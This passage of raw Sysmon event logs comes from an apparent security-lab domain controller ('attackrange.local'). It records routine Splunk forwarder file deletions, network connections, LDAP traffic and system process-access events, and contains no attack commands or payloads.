23542300x80000000000000002203977Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:44.400{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=979A70818DE7DB3C7548E1FFC0769981,SHA256=AF2D636AE7CD1842C78EB51A7CDBAD62F92CC6CFF7EE41F1BD811AC1608F2DC0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203976Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:39.939{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60746-false10.0.1.12-8000- 23542300x80000000000000002203978Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:45.431{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=729FFA8CA161055951F42C4B584CC589,SHA256=161207311A1A0F5E7B0247DE97DDA27F2DB5EB98CE992A7DEFD73D11DDCB4981,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203979Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:46.447{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABF478B9A192B5B4F50010B71370B680,SHA256=926D551B8DAEE138429535749818FE33B594AD87099F29DD2B944D0B44FFAA0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203980Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:47.462{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C279CFB24BDAAA49A60D584794E4AEDE,SHA256=C2C876DFC2B423A85E2DE0747753D229C24503865BC5925004E51D6CEE407333,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203983Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:48.478{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=157ED30212846D4416DEBB56AEE26DC0,SHA256=85D3C382B001482F1313473D2363673EE47228345D936BAE2A3BF4E832C7492D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203982Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:48.150{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=23A7606C3A5B8B0DD78AC3FD45AFDCF8,SHA256=CF8A936CDBD14A3141E0A1B31E606724CABB6BDC77B745A374C6C4D87C1E0233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203981Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:48.150{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F78BCEB8AE5CCCEA849D63B807800B66,SHA256=18A7D0F28819C354B221A02939F1088928E444BF62F2FB636DA4D446F022E314,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203985Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:49.509{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A832C5332FFC735EE9E53D8F992AACC8,SHA256=2ABB32DE55F7695BB5237BFCB61364BD9F26723397B256F3CFC4CC41DD7BC679,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203984Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:44.970{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60747-false10.0.1.12-8000- 23542300x80000000000000002203986Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:50.556{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0551ED024C007A385B5C81F5A3FE851,SHA256=436B5984649648F56C0A69032E0E4A7157634159292BCE0E1F1E1628B48CFAFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203987Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:51.603{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F98BCA91DE716F226C15F49BA2D5485A,SHA256=7076C0A79B80EC6AC501C45E41090D3E226499F12E373ABC0E41A05C10969884,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203988Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:52.712{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD7F78E53EF83E6C6452C8CAFDCFBDA4,SHA256=083A9BDCDAC1ECBCFF17AD95380C904D286CEBC77C4F3E7A2B4C342BD9852308,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203989Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:53.931{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C37E39D21D2D9553B361BC0F9336AA74,SHA256=64C4B1431CAEBFD043950984B261CD2C808E376A5CB0F30DCCFAAC4E6E682123,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203992Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:50.986{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60748-false10.0.1.12-8000- 23542300x80000000000000002203991Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:54.197{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=409F99764F528DCAF77099F41131BD5E,SHA256=B0BDA111993CFB00E1BAA4D7FACA67831910476CE431159012D0F8C97FC630B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203990Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:54.197{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=23A7606C3A5B8B0DD78AC3FD45AFDCF8,SHA256=CF8A936CDBD14A3141E0A1B31E606724CABB6BDC77B745A374C6C4D87C1E0233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203993Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:55.040{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=441BF57D56E79F27EBE51DDBC54F5F3D,SHA256=4CD4AD8C740E5E3F7DAFC2D4585F47533B64F3415153E047DFC9648A3AB21D33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203994Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:56.165{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78392851B04C5637BB1A6FB4E4B7C545,SHA256=93427F6D4EA44E48F9E135EA7955B0D3976238F05BDEB6D3F3E0B1C82B1EC1EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203998Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:53.924{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60749-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002203997Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:53.924{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60749-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002203996Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:57.197{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=409F99764F528DCAF77099F41131BD5E,SHA256=B0BDA111993CFB00E1BAA4D7FACA67831910476CE431159012D0F8C97FC630B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203995Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:57.181{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE4AF3E2A98F3F62AD0159E3CB6847C0,SHA256=5B7A9AD7EDFB5450EA5645E6DC6ADF4981596629C0EB4769372B8688F370484B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203999Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:58.197{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=180F738E1A654CFAEED4C08B7825E9F2,SHA256=847904B346D1656AFC8E0106A48036745594C013E2204F04B60720A54F134EFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204000Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:59.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AB9D46BCB896489DA08992D0499E81E,SHA256=9D6097D6C2C129D43F458064D5915CF12F5D0DBBFE4548002A6201C8B7B8092D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204002Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:00.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8F584B28790661EB4E8BA0CA5A83F8A,SHA256=891BE3767A0CAB870F5B2225C81063370ADAA1B252E4C279BEDDD95F0B6CDC56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204001Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:00.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=374BB3B0857835AFF2C92315AEDE2A71,SHA256=3F65F39592D9AC5CBA6E8FDD03F5EBA1FAB154272D0DF9394A031224C2846F42,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204004Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:57.002{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60750-false10.0.1.12-8000- 23542300x80000000000000002204003Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:01.243{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A05DB2CFF31BAD7466E17DEE8C6EC7D2,SHA256=BB94D6AE1B7CD5CECA30F361F87C11B1035FBD3454FA8DDCC49F04848ED432F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204022Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.712{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA3A-6040-624E-00000000AD01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204021Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.712{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204020Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.712{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204019Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.712{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204018Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.712{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204017Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.712{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-EA3A-6040-624E-00000000AD01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204016Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.712{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA3A-6040-624E-00000000AD01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204015Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.713{5ABCFE62-EA3A-6040-624E-00000000AD01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002204014Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.665{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F4FD9D8C25A95FFE4C3DDE3B987E143,SHA256=4597C2522EA808B19CC9C69F9445B84BD06543E617AD0A279EB2D85D6DAF8C61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204013Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.306{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=896CFFAFCA4B7144BEB426FC3CC1D91D,SHA256=D08F219987B312A564039F21E93CE58A48121C56E9EB1D827CE4F3A53B521066,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204012Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.212{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA3A-6040-614E-00000000AD01}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204011Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.212{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204010Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.212{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204009Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 